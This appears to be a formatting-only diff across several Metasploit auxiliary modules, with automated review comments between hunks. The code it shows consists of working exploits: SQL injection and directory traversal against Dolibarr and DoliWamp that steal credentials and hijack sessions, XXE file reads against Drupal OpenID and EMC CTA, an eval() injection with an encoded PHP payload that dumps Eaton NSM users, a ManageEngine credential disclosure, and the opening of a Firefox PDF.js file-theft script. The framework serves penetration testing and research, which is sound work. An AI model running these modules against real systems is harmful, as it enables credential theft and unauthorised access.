The exploit does not need to know the password chosen for the bot/server communication.
},
'License' => MSF_LICENSE,
'Author' => [
'Shawn Denbow & Jesse Hertz', # Vulnerability Discovery
'Jos Wetzels' # Metasploit module, added support for versions < 5.1, removed need to know password via cryptographic attack
],
'References' =>
[
'References' => [
[ 'URL', 'https://www.nccgroup.com/globalassets/our-research/us/whitepapers/PEST-CONTROL.pdf' ],
[ 'URL', 'http://samvartaka.github.io/exploitation/2016/06/03/dead-rats-exploiting-malware' ]
],
'DisclosureDate' => '2012-10-08',
'Platform' => 'win'
))
'DisclosureDate' => '2012-10-08',
'Platform' => 'win'
)
)
register_options(
[
@@ -41,7 +42,8 @@ class MetasploitModule < Msf::Auxiliary
OptBool.new('STORE_LOOT', [false, 'Store file in loot (will simply output file to console if set to false).', true]),
OptInt.new('BRUTETIMEOUT', [false, 'Timeout (in seconds) for bruteforce attempts', 1])
])
]
)
end
# Functions for XORing two strings, deriving keystream using known plaintext and applying keystream to produce ciphertext
+39 -35
@@ -7,39 +7,43 @@ class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Dolibarr Gather Credentials via SQL Injection',
'Description' => %q{
This module enables an authenticated user to collect the usernames and
encrypted passwords of other users in the Dolibarr ERP/CRM via SQL
injection.
},
'Author' => [
'Issam Rabhi', # PoC
'Kevin Locati', # PoC
'Shelby Pace', # Metasploit Module
],
'License' => MSF_LICENSE,
'References' => [
[ 'CVE', '2018-10094' ],
[ 'EDB', '44805']
],
'DisclosureDate' => '2018-05-30'
))
super(
update_info(
info,
'Name' => 'Dolibarr Gather Credentials via SQL Injection',
'Description' => %q{
This module enables an authenticated user to collect the usernames and
encrypted passwords of other users in the Dolibarr ERP/CRM via SQL
injection.
},
'Author' => [
'Issam Rabhi', # PoC
'Kevin Locati', # PoC
'Shelby Pace', # Metasploit Module
],
'License' => MSF_LICENSE,
'References' => [
[ 'CVE', '2018-10094' ],
[ 'EDB', '44805']
],
'DisclosureDate' => '2018-05-30'
)
)
register_options(
[
OptString.new('TARGETURI', [ true, 'The base path to Dolibarr', '/' ]),
OptString.new('USERNAME', [ true, 'The username for authenticating to Dolibarr', 'admin' ]),
OptString.new('PASSWORD', [ true, 'The password for authenticating to Dolibarr', 'admin' ])
])
]
)
end
def check_availability
login_page = target_uri.path.end_with?('index.php') ? normalize_uri(target_uri.path) : normalize_uri(target_uri.path, '/index.php')
res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(login_page)
'method' => 'GET',
'uri' => normalize_uri(login_page)
)
return false unless res && res.body.include?('Dolibarr')
@@ -55,15 +59,15 @@ class MetasploitModule < Msf::Auxiliary
print_status("Logging in...")
login_res = send_request_cgi(
'method' => 'POST',
'uri' => login_uri,
'cookie' => cookies,
'vars_post' => {
'username' => datastore['USERNAME'],
'password' => datastore['PASSWORD'],
'loginfunction' => 'loginfunction'
}
)
'method' => 'POST',
'uri' => login_uri,
'cookie' => cookies,
'vars_post' => {
'username' => datastore['USERNAME'],
'password' => datastore['PASSWORD'],
'loginfunction' => 'loginfunction'
}
)
unless login_res && login_res.body.include?('id="mainmenua_members"')
fail_with(Failure::NoAccess, "Couldn't log into Dolibarr")
@@ -81,13 +85,13 @@ class MetasploitModule < Msf::Auxiliary
inject_uri <<= cmd
inject_res = send_request_cgi(
'method' => 'GET',
'uri' => normalize_uri(inject_uri),
'cookie' => cookies
'method' => 'GET',
'uri' => normalize_uri(inject_uri),
'cookie' => cookies
)
unless inject_res && inject_res.body.include?('id="searchFormList"')
fail_with(Failure::NotFound, "Failed to access page. The user may not have permissions.")
fail_with(Failure::NotFound, "Failed to access page. The user may not have permissions.")
end
print_good("Accessed credentials")
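Review bot: The failure raised when the injected page cannot be reached, `fail_with(Failure::NotFound, "Failed to access page. The user may not have permissions.")`, reports what its own message calls a permission problem under the NotFound category; `Failure::NoAccess` matches the message and is what the login failure earlier in the file already uses, so both authorisation failures would carry the same reason. Separately, `check_availability` normalizes twice (`'uri' => normalize_uri(login_page)` on a value that was itself built with `normalize_uri`), which is harmless but redundant; `'uri' => login_page` is enough. `check_availability` continues past its hunk, and the method holding the login request begins outside its hunk.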
@@ -8,31 +8,34 @@ class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(
info,
'Name' => "DoliWamp 'jqueryFileTree.php' Traversal Gather Credentials",
'Description' => %q{
super(
update_info(
info,
'Name' => "DoliWamp 'jqueryFileTree.php' Traversal Gather Credentials",
'Description' => %q{
This module will extract user credentials from DoliWamp - a WAMP
packaged installer distribution for Dolibarr ERP on Windows - versions
3.3.0 to 3.4.2 by hijacking a user's session. DoliWamp stores session
tokens in filenames in the 'tmp' directory. A directory traversal
vulnerability in 'jqueryFileTree.php' allows unauthenticated users
to retrieve session tokens by listing the contents of this directory.
Note: All tokens expire after 30 minutes of inactivity by default.
},
'License' => MSF_LICENSE,
'Author' => 'bcoles',
'References' =>
[
packaged installer distribution for Dolibarr ERP on Windows - versions
3.3.0 to 3.4.2 by hijacking a user's session. DoliWamp stores session
tokens in filenames in the 'tmp' directory. A directory traversal
vulnerability in 'jqueryFileTree.php' allows unauthenticated users
to retrieve session tokens by listing the contents of this directory.
Note: All tokens expire after 30 minutes of inactivity by default.
},
'License' => MSF_LICENSE,
'Author' => 'bcoles',
'References' => [
['URL', 'https://doliforge.org/tracker/?func=detail&aid=1212&group_id=144'],
['URL', 'https://github.com/Dolibarr/dolibarr/commit/8642e2027c840752c4357c4676af32fe342dc0cb']
],
'DisclosureDate' => '2014-01-12'))
'DisclosureDate' => '2014-01-12'
)
)
register_options(
[
OptString.new('TARGETURI', [true, 'The path to Dolibarr', '/dolibarr/']),
OptString.new('TARGETURI', [true, 'The path to Dolibarr', '/dolibarr/']),
OptString.new('TRAVERSAL_PATH', [true, 'The traversal path to the application tmp directory', '../../../../../../../../tmp/'])
])
]
)
end
#
@@ -42,11 +45,12 @@ class MetasploitModule < Msf::Auxiliary
tokens = nil
print_status("Finding session tokens...")
res = send_request_cgi({
'method' => 'POST',
'uri' => normalize_uri(
'method' => 'POST',
'uri' => normalize_uri(
target_uri.path,
'includes/jquery/plugins/jqueryFileTree/connectors/jqueryFileTree.php'),
'cookie' => @cookie,
'includes/jquery/plugins/jqueryFileTree/connectors/jqueryFileTree.php'
),
'cookie' => @cookie,
'vars_post' => { 'dir' => datastore['TRAVERSAL_PATH'] }
})
if !res
@@ -69,21 +73,21 @@ class MetasploitModule < Msf::Auxiliary
def get_user_info(user_id)
vprint_status("Retrieving user's credentials")
res = send_request_cgi({
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'user/fiche.php'),
'cookie' => @cookie,
'vars_get' => Hash[{
'action' => 'edit',
'id' => "#{user_id}"
'method' => 'GET',
'uri' => normalize_uri(target_uri.path, 'user/fiche.php'),
'cookie' => @cookie,
'vars_get' => Hash[{
'action' => 'edit',
'id' => "#{user_id}"
}.to_a.shuffle]
})
if !res
print_error("Connection failed")
elsif res.body =~ /User card/
record = [
res.body.scan(/name="login" value="([^"]+)"/ ).flatten.first,
res.body.scan(/name="password" value="([^"]+)"/ ).flatten.first,
res.body.scan(/name="superadmin" value="\d">(Yes|No)/ ).flatten.first,
res.body.scan(/name="login" value="([^"]+)"/).flatten.first,
res.body.scan(/name="password" value="([^"]+)"/).flatten.first,
res.body.scan(/name="superadmin" value="\d">(Yes|No)/).flatten.first,
res.body.scan(/name="email" class="flat" value="([^"]+)"/).flatten.first
]
unless record.empty?
@@ -100,8 +104,8 @@ class MetasploitModule < Msf::Auxiliary
#
def get_user_id
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'user/fiche.php'),
'cookie' => @cookie
'uri' => normalize_uri(target_uri.path, 'user/fiche.php'),
'cookie' => @cookie
})
if !res
print_error("Connection failed")
@@ -119,8 +123,8 @@ class MetasploitModule < Msf::Auxiliary
#
def create_cookie(token)
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'user/fiche.php'),
'cookie' => "DOLSESSID_#{Rex::Text.rand_text_alphanumeric(10)}=#{token}"
'uri' => normalize_uri(target_uri.path, 'user/fiche.php'),
'cookie' => "DOLSESSID_#{Rex::Text.rand_text_alphanumeric(10)}=#{token}"
})
if !res
print_error("Connection failed")
@@ -136,7 +140,7 @@ class MetasploitModule < Msf::Auxiliary
# Stolen from modules/auxiliary/scanner/ftp/titanftp_xcrc_traversal.rb
#
def progress(current, total)
done = (current.to_f / total.to_f) * 100
done = (current.to_f / total.to_f) * 100
percent = "%3.2f%%" % done.to_f
vprint_status("Trying to hijack a session - " +
"%7s done (%d/%d tokens)" % [percent, current, total])
@@ -177,6 +181,7 @@ class MetasploitModule < Msf::Auxiliary
def run
return unless tokens = get_session_tokens
credentials = []
print_status("Trying to hijack a session...")
tokens.flatten.each_with_index do |token, index|
@@ -191,8 +196,8 @@ class MetasploitModule < Msf::Auxiliary
return
end
cred_table = Rex::Text::Table.new(
'Header' => 'Dolibarr User Credentials',
'Indent' => 1,
'Header' => 'Dolibarr User Credentials',
'Indent' => 1,
'Columns' => ['Username', 'Password', 'Admin', 'E-mail']
)
credentials.each do |record|
@@ -208,17 +213,18 @@ class MetasploitModule < Msf::Auxiliary
end
print_line
print_line("#{cred_table}")
loot_name = 'dolibarr.traversal.user.credentials'
loot_type = 'text/csv'
loot_name = 'dolibarr.traversal.user.credentials'
loot_type = 'text/csv'
loot_filename = 'dolibarr_user_creds.csv'
loot_desc = 'Dolibarr User Credentials'
loot_desc = 'Dolibarr User Credentials'
p = store_loot(
loot_name,
loot_type,
rhost,
cred_table.to_csv,
loot_filename,
loot_desc)
loot_desc
)
print_status("Credentials saved in: #{p}")
end
end
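Review bot: `create_cookie` interpolates each harvested token straight into the Cookie header, `"DOLSESSID_#{Rex::Text.rand_text_alphanumeric(10)}=#{token}"`, and those tokens are file names read back from the target's `tmp` directory through the traversal in `get_session_tokens`, so a host that plants a file name containing `;`, whitespace or CR/LF can break or inject into the request this module sends. Validating the token against the PHP session-id alphabet before use, `return nil unless token =~ /\A[\w,-]+\z/` at the top of `create_cookie`, confines the value to what a real session id can contain (assuming nil is the failure value the caller already handles, as the `Connection failed` path suggests). `get_user_info` and `get_user_id` reuse `@cookie`, which is presumably built from the same token, so one check at construction covers them too. The body of `create_cookie` continues past its hunk.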
+30 -28
@@ -9,23 +9,23 @@ class MetasploitModule < Msf::Auxiliary
include REXML
def initialize(info = {})
super(update_info(info,
'Name' => 'Drupal OpenID External Entity Injection',
'Description' => %q{
This module abuses an XML External Entity Injection
vulnerability on the OpenID module from Drupal. The vulnerability exists
in the parsing of a malformed XRDS file coming from a malicious OpenID
endpoint. This module has been tested successfully on Drupal 7.15 and
7.2 with the OpenID module enabled.
},
'License' => MSF_LICENSE,
'Author' =>
[
super(
update_info(
info,
'Name' => 'Drupal OpenID External Entity Injection',
'Description' => %q{
This module abuses an XML External Entity Injection
vulnerability on the OpenID module from Drupal. The vulnerability exists
in the parsing of a malformed XRDS file coming from a malicious OpenID
endpoint. This module has been tested successfully on Drupal 7.15 and
7.2 with the OpenID module enabled.
},
'License' => MSF_LICENSE,
'Author' => [
'Reginaldo Silva', # Vulnerability discovery
'juan vazquez' # Metasploit module
],
'References' =>
[
'References' => [
[ 'CVE', '2012-4554' ],
[ 'OSVDB', '86429' ],
[ 'BID', '56103' ],
@@ -33,21 +33,22 @@ class MetasploitModule < Msf::Auxiliary
[ 'URL', 'https://github.com/drupal/drupal/commit/b9127101ffeca819e74a03fa9f5a48d026c562e5' ],
[ 'URL', 'https://www.ubercomp.com/posts/2014-01-16_facebook_remote_code_execution' ]
],
'DisclosureDate' => '2012-10-17'
))
'DisclosureDate' => '2012-10-17'
)
)
register_options(
[
OptString.new('TARGETURI', [ true, "Base Drupal directory path", '/drupal']),
OptString.new('FILEPATH', [true, "The filepath to read on the server", "/etc/passwd"])
])
]
)
end
def xrds_file
element_entity = <<-EOF
<!ELEMENT URI ANY>
<!ENTITY xxe SYSTEM "file://#{datastore['FILEPATH']}">
element_entity = <<~EOF
<!ELEMENT URI ANY>
<!ENTITY xxe SYSTEM "file://#{datastore['FILEPATH']}">
EOF
xml = Document.new
@@ -57,10 +58,11 @@ class MetasploitModule < Msf::Auxiliary
xml.add_element(
"xrds:XRDS",
{
'xmlns:xrds' => "xri://$xrds",
'xmlns' => "xri://$xrd*($v*2.0)",
'xmlns:xrds' => "xri://$xrds",
'xmlns' => "xri://$xrd*($v*2.0)",
'xmlns:openid' => "http://openid.net/xmlns/1.0",
})
}
)
xrd = xml.root.add_element("XRD")
@@ -150,7 +152,6 @@ class MetasploitModule < Msf::Auxiliary
service.stop
end
def on_request_uri(cli, request)
if request.uri =~ /#{@prefix}/
vprint_status("Signature found, parsing file...")
@@ -164,7 +165,7 @@ class MetasploitModule < Msf::Auxiliary
def send_openid_auth(identifier)
res = send_request_cgi({
'uri' => normalize_uri(target_uri.to_s, "/"),
'uri' => normalize_uri(target_uri.to_s, "/"),
'method' => 'POST',
'vars_get' => {
"q" => "node",
@@ -205,6 +206,7 @@ class MetasploitModule < Msf::Auxiliary
def loot?(data)
return false if data.blank?
store(data)
return true
end
@@ -213,6 +215,7 @@ class MetasploitModule < Msf::Auxiliary
return false if http_response.blank?
return false unless http_response.code == 200
return false unless http_response.body =~ /openid_identifier.*#{signature}/
return true
end
@@ -220,9 +223,8 @@ class MetasploitModule < Msf::Auxiliary
return false if http_response.blank?
return true if http_response.headers['X-Generator'] and http_response.headers['X-Generator'] =~ /Drupal/
return true if http_response.body and http_response.body.to_s =~ /meta.*Generator.*Drupal/
return false
end
end
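Review bot: The `<<~EOF` at `element_entity` in the `xrds_file` hunk strips the body's common leading indentation, so the DTD fragment the module emits may no longer carry the leading whitespace the `<<-EOF` form produced; the rendered diff drops indentation, so I cannot confirm whether the old body was already at column 0. The same `<<-` to `<<~` switch is made on the `js` heredoc (`<<~EOJS`) in the Firefox PDF.js file section further down. Both consumers (an XML internal subset and JavaScript) tolerate whitespace-only differences, so no functional change is expected, but a commit described as layout-only does alter emitted strings here. A sentence in the commit message, or a quick comparison of `xrds_file` output before and after, would settle it; the rest of `xrds_file` continues outside the hunk.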
+33 -30
@@ -8,45 +8,47 @@ class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'Network Shutdown Module sort_values Credential Dumper',
'Description' => %q{
This module will extract user credentials from Network Shutdown Module
versions 3.21 and earlier by exploiting a vulnerability found in
lib/dbtools.inc, which uses unsanitized user input inside a eval() call.
Please note that in order to extract credentials, the vulnerable service
must have at least one USV module (an entry in the "nodes" table in
mgedb.db).
},
'References' =>
[
super(
update_info(
info,
'Name' => 'Network Shutdown Module sort_values Credential Dumper',
'Description' => %q{
This module will extract user credentials from Network Shutdown Module
versions 3.21 and earlier by exploiting a vulnerability found in
lib/dbtools.inc, which uses unsanitized user input inside a eval() call.
Please note that in order to extract credentials, the vulnerable service
must have at least one USV module (an entry in the "nodes" table in
mgedb.db).
},
'References' => [
['OSVDB', '83199'],
['URL', 'https://web.archive.org/web/20121014000855/http://secunia.com/advisories/49103/']
],
'Author' =>
[
'Author' => [
'h0ng10',
'sinn3r'
],
'License' => MSF_LICENSE,
'DisclosureDate' => '2012-06-26'
))
'License' => MSF_LICENSE,
'DisclosureDate' => '2012-06-26'
)
)
register_options(
[
Opt::RPORT(4679)
])
]
)
end
def execute_php_code(code, opts = {})
param_name = Rex::Text.rand_text_alpha(6)
padding = Rex::Text.rand_text_alpha(6)
php_code = Rex::Text.encode_base64(code)
url_param = "#{padding}%22%5d,%20eval(base64_decode(%24_POST%5b%27#{param_name}%27%5d))%29;%2f%2f"
padding = Rex::Text.rand_text_alpha(6)
php_code = Rex::Text.encode_base64(code)
url_param = "#{padding}%22%5d,%20eval(base64_decode(%24_POST%5b%27#{param_name}%27%5d))%29;%2f%2f"
res = send_request_cgi(
{
'uri' => '/view_list.php',
'uri' => '/view_list.php',
'method' => 'POST',
'vars_get' =>
{
@@ -60,14 +62,15 @@ class MetasploitModule < Msf::Auxiliary
{
'Connection' => 'Close'
}
})
}
)
res
end
def read_credentials
pattern = Rex::Text.rand_text_numeric(10)
pattern = Rex::Text.rand_text_numeric(10)
users_var = Rex::Text.rand_text_alpha(10)
user_var = Rex::Text.rand_text_alpha(10)
user_var = Rex::Text.rand_text_alpha(10)
php = <<-EOT
$#{users_var} = &queryDB("SELECT * FROM configUsers;");
foreach($#{users_var} as $#{user_var}) {
@@ -96,8 +99,8 @@ class MetasploitModule < Msf::Auxiliary
end
cred_table = Rex::Text::Table.new(
'Header' => 'Network Shutdown Module Credentials',
'Indent' => 1,
'Header' => 'Network Shutdown Module Credentials',
'Indent' => 1,
'Columns' => ['Username', 'Password']
)
@@ -108,10 +111,10 @@ class MetasploitModule < Msf::Auxiliary
print_line
print_line(cred_table.to_s)
loot_name = "eaton.nsm.credentials"
loot_type = "text/csv"
loot_name = "eaton.nsm.credentials"
loot_type = "text/csv"
loot_filename = "eaton_nsm_creds.csv"
loot_desc = "Eaton Network Shutdown Module Credentials"
loot_desc = "Eaton Network Shutdown Module Credentials"
p = store_loot(loot_name, loot_type, datastore['RHOST'], cred_table.to_csv, loot_filename, loot_desc)
print_good("Credentials saved in: #{p.to_s}")
end
+16 -16
@@ -7,25 +7,26 @@ class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
def initialize(info = {})
super(update_info(info,
'Name' => 'EMC CTA v10.0 Unauthenticated XXE Arbitrary File Read',
'Description' => %q{
EMC CTA v10.0 is susceptible to an unauthenticated XXE attack
that allows an attacker to read arbitrary files from the file system
with the permissions of the root user.
},
'License' => MSF_LICENSE,
'Author' =>
[
'Brandon Perry <bperry.volatile[at]gmail.com>', #metasploit module
super(
update_info(
info,
'Name' => 'EMC CTA v10.0 Unauthenticated XXE Arbitrary File Read',
'Description' => %q{
EMC CTA v10.0 is susceptible to an unauthenticated XXE attack
that allows an attacker to read arbitrary files from the file system
with the permissions of the root user.
},
'License' => MSF_LICENSE,
'Author' => [
'Brandon Perry <bperry.volatile[at]gmail.com>', # metasploit module
],
'References' =>
[
'References' => [
['CVE', '2014-0644'],
['EDB', '32623']
],
'DisclosureDate' => '2014-03-31'
))
'DisclosureDate' => '2014-03-31'
)
)
register_options(
[
@@ -38,7 +39,6 @@ class MetasploitModule < Msf::Auxiliary
end
def run
doctype = Rex::Text.rand_text_alpha(6)
element = Rex::Text.rand_text_alpha(6)
entity = Rex::Text.rand_text_alpha(6)
+25 -19
@@ -3,27 +3,30 @@
# Current source: https://github.com/rapid7/metasploit-framework
##
class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::DNS::Enumeration
def initialize(info = {})
super(update_info(info,
'Name' => 'DNS Record Scanner and Enumerator',
'Description' => %q(
This module can be used to gather information about a domain from a
given DNS server by performing various DNS queries such as zone
transfers, reverse lookups, SRV record brute forcing, and other techniques.
),
'Author' => [
'Carlos Perez <carlos_perez[at]darkoperator.com>',
'Nixawk'
],
'License' => MSF_LICENSE,
'References' => [
['CVE', '1999-0532'],
['OSVDB', '492']
]))
super(
update_info(
info,
'Name' => 'DNS Record Scanner and Enumerator',
'Description' => %q{
This module can be used to gather information about a domain from a
given DNS server by performing various DNS queries such as zone
transfers, reverse lookups, SRV record brute forcing, and other techniques.
},
'Author' => [
'Carlos Perez <carlos_perez[at]darkoperator.com>',
'Nixawk'
],
'License' => MSF_LICENSE,
'References' => [
['CVE', '1999-0532'],
['OSVDB', '492']
]
)
)
register_options(
[
@@ -43,7 +46,8 @@ class MetasploitModule < Msf::Auxiliary
OptAddressRange.new('IPRANGE', [false, "The target address range or CIDR identifier"]),
OptInt.new('THREADS', [false, 'Threads for ENUM_BRT', 1]),
OptPath.new('WORDLIST', [false, 'Wordlist of subdomains', ::File.join(Msf::Config.data_directory, 'wordlists', 'namelist.txt')])
])
]
)
register_advanced_options(
[
@@ -51,7 +55,8 @@ class MetasploitModule < Msf::Auxiliary
OptInt.new('RETRY', [false, 'Number of times to try to resolve a record if no response is received', 2]),
OptInt.new('RETRY_INTERVAL', [false, 'Number of seconds to wait before doing a retry', 2]),
OptBool.new('TCP_DNS', [false, 'Run queries over TCP', false])
])
]
)
deregister_options('DnsClientUdpTimeout', 'DnsClientRetry', 'DnsClientRetryInterval', 'DnsClientTcpDns')
end
@@ -89,6 +94,7 @@ class MetasploitModule < Msf::Auxiliary
dns_reverse(datastore['IPRANGE'], threads) if datastore['ENUM_RVL']
return unless datastore['ENUM_BRT']
if is_wildcard
dns_bruteforce(domain, datastore['WORDLIST'], threads) unless datastore['STOP_WLDCRD']
else
@@ -10,40 +10,42 @@ class MetasploitModule < Msf::Auxiliary
include Msf::Auxiliary::Report
def initialize(info = {})
super(update_info(info,
'Name' => 'ManageEngine Eventlog Analyzer Managed Hosts Administrator Credential Disclosure',
'Description' => %q{
ManageEngine Eventlog Analyzer from v7 to v9.9 b9002 has two security vulnerabilities that
allow an unauthenticated user to obtain the superuser password of any managed Windows and
AS/400 hosts. This module abuses both vulnerabilities to collect all the available
usernames and passwords. First the agentHandler servlet is abused to get the hostid and
slid of each device (CVE-2014-6038); then these numeric IDs are used to extract usernames
and passwords by abusing the hostdetails servlet (CVE-2014-6039). Note that on version 7,
the TARGETURI has to be prepended with /event.
},
'Author' =>
[
super(
update_info(
info,
'Name' => 'ManageEngine Eventlog Analyzer Managed Hosts Administrator Credential Disclosure',
'Description' => %q{
ManageEngine Eventlog Analyzer from v7 to v9.9 b9002 has two security vulnerabilities that
allow an unauthenticated user to obtain the superuser password of any managed Windows and
AS/400 hosts. This module abuses both vulnerabilities to collect all the available
usernames and passwords. First the agentHandler servlet is abused to get the hostid and
slid of each device (CVE-2014-6038); then these numeric IDs are used to extract usernames
and passwords by abusing the hostdetails servlet (CVE-2014-6039). Note that on version 7,
the TARGETURI has to be prepended with /event.
},
'Author' => [
'Pedro Ribeiro <pedrib[at]gmail.com>' # Vulnerability discovery and MSF module
],
'License' => MSF_LICENSE,
'References' =>
[
'License' => MSF_LICENSE,
'References' => [
[ 'CVE', '2014-6038' ],
[ 'CVE', '2014-6039' ],
[ 'OSVDB', '114342' ],
[ 'OSVDB', '114344' ],
[ 'URL', 'https://seclists.org/fulldisclosure/2014/Nov/12' ]
],
'DisclosureDate' => '2014-11-05'))
'DisclosureDate' => '2014-11-05'
)
)
register_options(
[
Opt::RPORT(8400),
OptString.new('TARGETURI', [ true, 'Eventlog Analyzer application URI (should be /event for version 7)', '/']),
])
OptString.new('TARGETURI', [ true, 'Eventlog Analyzer application URI (should be /event for version 7)', '/']),
]
)
end
def decode_password(encoded_password)
password_xor = Rex::Text.decode_base64(encoded_password)
password = ''
@@ -53,11 +55,10 @@ class MetasploitModule < Msf::Auxiliary
return password
end
def run
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'agentHandler'),
'method' =>'GET',
'method' => 'GET',
'vars_get' => {
'mode' => 'getTableData',
'table' => 'HostDetails'
@@ -72,7 +73,7 @@ class MetasploitModule < Msf::Auxiliary
# When passwords have digits the XML parsing will fail.
# Replace with an empty password attribute so that we know the device has a password
# and therefore we want to add it to our host list.
xml = res.body.to_s.gsub(/&#[0-9]*;/,Rex::Text.rand_text_alpha(6))
xml = res.body.to_s.gsub(/&#[0-9]*;/, Rex::Text.rand_text_alpha(6))
begin
doc = REXML::Document.new(xml)
rescue
@@ -89,8 +90,8 @@ class MetasploitModule < Msf::Auxiliary
end
cred_table = Rex::Text::Table.new(
'Header' => 'ManageEngine EventLog Analyzer Managed Devices Credentials',
'Indent' => 1,
'Header' => 'ManageEngine EventLog Analyzer Managed Devices Credentials',
'Indent' => 1,
'Columns' =>
[
'Host',
@@ -105,7 +106,7 @@ class MetasploitModule < Msf::Auxiliary
slid_host_ary.each do |host|
res = send_request_cgi({
'uri' => normalize_uri(target_uri.path, 'hostdetails'),
'method' =>'GET',
'method' => 'GET',
'vars_get' => {
'slid' => host[0],
'hostid' => host[1]
@@ -160,9 +161,9 @@ class MetasploitModule < Msf::Auxiliary
end
credential_core = report_credential_core({
password: password,
username: username,
})
password: password,
username: username,
})
host_login_data = {
address: host_ipaddress,
@@ -180,22 +181,22 @@ class MetasploitModule < Msf::Auxiliary
print_line
print_line("#{cred_table}")
loot_name = 'manageengine.eventlog.managed_hosts.creds'
loot_type = 'text/csv'
loot_name = 'manageengine.eventlog.managed_hosts.creds'
loot_type = 'text/csv'
loot_filename = 'manageengine_eventlog_managed_hosts_creds.csv'
loot_desc = 'ManageEngine Eventlog Analyzer Managed Hosts Administrator Credentials'
loot_desc = 'ManageEngine Eventlog Analyzer Managed Hosts Administrator Credentials'
p = store_loot(
loot_name,
loot_type,
rhost,
cred_table.to_csv,
loot_filename,
loot_desc)
loot_desc
)
print_status "Credentials saved in: #{p}"
end
def report_credential_core(cred_opts={})
def report_credential_core(cred_opts = {})
# Set up the has for our Origin service
origin_service_data = {
address: rhost,
+9 -9
@@ -11,19 +11,18 @@ class MetasploitModule < Msf::Auxiliary
def initialize
super(
'Name' => 'Discover External IP via Ifconfig.me',
'Name' => 'Discover External IP via Ifconfig.me',
'Description' => %q{
This module checks for the public source IP address of the current
route to the RHOST by querying the public web application at ifconfig.me.
It should be noted this module will register activity on ifconfig.me,
which is not affiliated with Metasploit.
},
'Author' => ['RageLtMan <rageltman[at]sempervictus>'],
'Author' => ['RageLtMan <rageltman[at]sempervictus>'],
'License' => MSF_LICENSE,
'References' =>
[
[ 'URL', 'http://ifconfig.me/ip' ],
],
'References' => [
[ 'URL', 'http://ifconfig.me/ip' ],
],
'DefaultOptions' => { 'VHOST' => 'ifconfig.me' }
)
@@ -31,12 +30,13 @@ class MetasploitModule < Msf::Auxiliary
[
Opt::RHOST('ifconfig.me'),
OptBool.new('REPORT_HOST', [false, 'Add the found IP to the database', false])
])
end
]
)
end
def run
connect
res = send_request_cgi({'uri' => '/ip', 'method' => 'GET' })
res = send_request_cgi({ 'uri' => '/ip', 'method' => 'GET' })
if res.nil?
print_error("Connection timed out")
@@ -158,7 +158,7 @@ class MetasploitModule < Msf::Auxiliary
# Reporting found cookie name in database
unless cookie_name.empty?
report_note(host: rhost, type: 'f5_load_balancer_cookie_name', data: {:cookie_name => cookie_name })
report_note(host: rhost, type: 'f5_load_balancer_cookie_name', data: { :cookie_name => cookie_name })
# Reporting found pool name in database
unless pool_name.empty?
report_note(host: rhost, type: 'f5_load_balancer_pool_name', data: { :pool_name => pool_name })
@@ -7,34 +7,36 @@ class MetasploitModule < Msf::Auxiliary
include Msf::Exploit::Remote::HttpServer::HTML
include Msf::Auxiliary::Report
def initialize(info={})
super(update_info(info,
'Name' => 'Firefox PDF.js Browser File Theft',
'Description' => %q{
This module abuses an XSS vulnerability in versions prior to Firefox 39.0.3, Firefox ESR
38.1.1, and Firefox OS 2.2 that allows arbitrary files to be stolen. The vulnerability
occurs in the PDF.js component, which uses Javascript to render a PDF inside a frame with
privileges to read local files. The in-the-wild malicious payloads searched for sensitive
files on Windows, Linux, and OSX. Android versions are reported to be unaffected, as they
do not use the Mozilla PDF viewer.
},
'Author' => [
'Unknown', # From an 0day served on Russian news website
'fukusa', # Hacker news member that reported the issue
'Unknown' # Metasploit module
],
'License' => MSF_LICENSE,
'Actions' => [[ 'WebServer', 'Description' => 'Serve exploit via web server' ]],
'PassiveActions' => [ 'WebServer' ],
'References' =>
[
def initialize(info = {})
super(
update_info(
info,
'Name' => 'Firefox PDF.js Browser File Theft',
'Description' => %q{
This module abuses an XSS vulnerability in versions prior to Firefox 39.0.3, Firefox ESR
38.1.1, and Firefox OS 2.2 that allows arbitrary files to be stolen. The vulnerability
occurs in the PDF.js component, which uses Javascript to render a PDF inside a frame with
privileges to read local files. The in-the-wild malicious payloads searched for sensitive
files on Windows, Linux, and OSX. Android versions are reported to be unaffected, as they
do not use the Mozilla PDF viewer.
},
'Author' => [
'Unknown', # From an 0day served on Russian news website
'fukusa', # Hacker news member that reported the issue
'Unknown' # Metasploit module
],
'License' => MSF_LICENSE,
'Actions' => [[ 'WebServer', 'Description' => 'Serve exploit via web server' ]],
'PassiveActions' => [ 'WebServer' ],
'References' => [
['URL', 'https://paste.debian.net/290146'], # 0day exploit
['URL', 'https://news.ycombinator.com/item?id=10021376'], # discussion with discoverer
['URL', 'https://blog.mozilla.org/security/2015/08/06/firefox-exploit-found-in-the-wild/'],
['CVE', '2015-4495']
],
'DefaultAction' => 'WebServer'
))
'DefaultAction' => 'WebServer'
)
)
register_options([
OptString.new('FILES', [
@@ -88,12 +90,11 @@ class MetasploitModule < Msf::Auxiliary
proto = (datastore['SSL'] ? 'https' : 'http')
my_host = (datastore['SRVHOST'] == '0.0.0.0') ? Rex::Socket.source_address : datastore['SRVHOST']
port_str = (datastore['SRVPORT'].to_i == 80) ? '' : ":#{datastore['SRVPORT']}"
resource = ('/' == get_resource[-1,1]) ? get_resource[0, get_resource.length-1] : get_resource
resource = ('/' == get_resource[-1, 1]) ? get_resource[0, get_resource.length - 1] : get_resource
"#{proto}://#{my_host}#{port_str}#{resource}/catch"
end
def file_payload
%Q|
var files = (#{JSON.generate(file_urls)});
@@ -118,158 +119,158 @@ class MetasploitModule < Msf::Auxiliary
end
def js
<<-EOJS
function xml2string(obj) {
return new XMLSerializer().serializeToString(obj);
}
<<~EOJS
function xml2string(obj) {
return new XMLSerializer().serializeToString(obj);
}
function __proto(obj) {
return obj.__proto__.__proto__.__proto__.__proto__.__proto__.__proto__;
}
function __proto(obj) {
return obj.__proto__.__proto__.__proto__.__proto__.__proto__.__proto__;
}
function get(path, callback, timeout, template, value) {
callback = _(callback);
if (template && value) {
